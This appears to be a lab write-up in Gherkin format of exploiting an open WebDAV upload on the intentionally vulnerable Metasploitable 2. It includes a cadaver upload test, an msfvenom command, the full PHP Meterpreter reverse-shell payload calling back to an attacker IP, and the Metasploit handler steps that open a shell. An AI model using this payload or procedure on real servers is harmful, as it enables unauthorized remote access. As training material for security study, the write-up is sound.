## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 2
  Category:
    Insecure WebDAV Misconfiguration
  Location:
    http://localhost/dav
  CWE:
    CWE-548: Information Exposure Through Directory Listing
      https://cwe.mitre.org/data/definitions/548.html
    CWE-285: Improper Authorization
      https://cwe.mitre.org/data/definitions/285.html
    CWE-732: Incorrect Permission Assignment for Critical Resource
      https://cwe.mitre.org/data/definitions/732.html
    CWE-933: Security Misconfiguration
      https://cwe.mitre.org/data/definitions/933.html
  Rule:
    REQ.265: https://fluidattacks.com/web/rules/265/
  Goal:
    Gain access to the host machine
  Recommendation:
    Enable the authentication to access the webDAV service

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali GNU        | 2019.2      |
    | chrome          | 74.0.3729.1 |
    | Metasploit      | 4.14.13     |
  TOE information:
    Given I am accessing the site http://localhost/dav
    And enter a site that allows me to go to different services with vulns
    And Apache version 2.2.8
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario: Normal use case
    Given I access http://localhost
    Then I see a webpage with links to other pages with services
    When I enter on the hypertext WebDAV
    Then I get to see an empty directory list
    And I see the server version """Apache/2.2.8 (Ubuntu) DAV/2 Server"""

  Scenario: Static detection
    Given I seek on internet the server version vulnerabilities
    When I found is posible unauthorized upload of documents for DAV
    And  I execute the following command in my machine:
    """
    echo 'This is a test for file inclusion' > Prueba.txt
    cadaver http://192.168.1.21/dav
    put Prueba.txt
    """
    Then I get this output:
    """
    ...
    Uploading Prueba.txt to `/dav/Prueba.txt':
    Progress: [=============================>] 100.0% of 34 bytes succeeded.
    dav:/dav/>
    ...
    """
    When I reload the browser on http://localhost/dav
    Then It appears the document """Prueba.txt""" with its expecifications
    And I conclude that the webpage allows unauthorized upload

  Scenario: Dynamic detection
    Given I can upload files without credentials
    When I execute the following command to create a script for a reverse shell
    """
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.22 lport=4545
    -f raw
    """
    Then I copy the output to a file named """shell.php""" with the following:
    """
    ...
    /*<?php /**/ error_reporting(0); $ip = '192.168.1.178'; $port = 4545;
    if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp:
    //{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen')
    && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (
    !$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET,
    SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!
    $res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket
    funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case '
    stream': $len = fread($s, 4); break; case 'socket': $len = socket_read
    ($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);
    $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type)
    { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket':
    $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] =
    $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin')
    && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_
    function('', $b); $suhosin_bypass(); } else { eval($b); } die();
    """
    And I upload the file with the shell script to DAV

  Scenario: Exploitation
    Given target host have the reverse shell script uploaded
    When I execute the following commands on a terminal:
    """
    msfconsole
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.1.178
    msf5 exploit(multi/handler) > set lport 4545
    msf5 exploit(multi/handler) > exploit
    """
    And I clicked on the browser the """shell.php""" file to open it
    Then I get the output:
    """
    [*] Started reverse TCP handler on 192.168.1.178:4545
    [*] Sending stage (38247 bytes) to 192.168.1.21
    [*] Meterpreter session 1 opened (192.168.1.178:4545 -> 192.168.1.21:49086)
    at 2019-07-12 16:04:31 -0500
    meterpreter >
    """
    When I execute the following commands on a terminal:
    """
    sysinfo
    ls ../../../
    """
    And I get to see directories and files of configurations of the server
    Then I have successfully get access to the host machine
    And I can navigate throught the files of the machine

  Scenario: Remediation
    Configure the authentication for WebDAV and disable the default credentials

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.9/10 (High) - AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.5/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.6/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-07-12
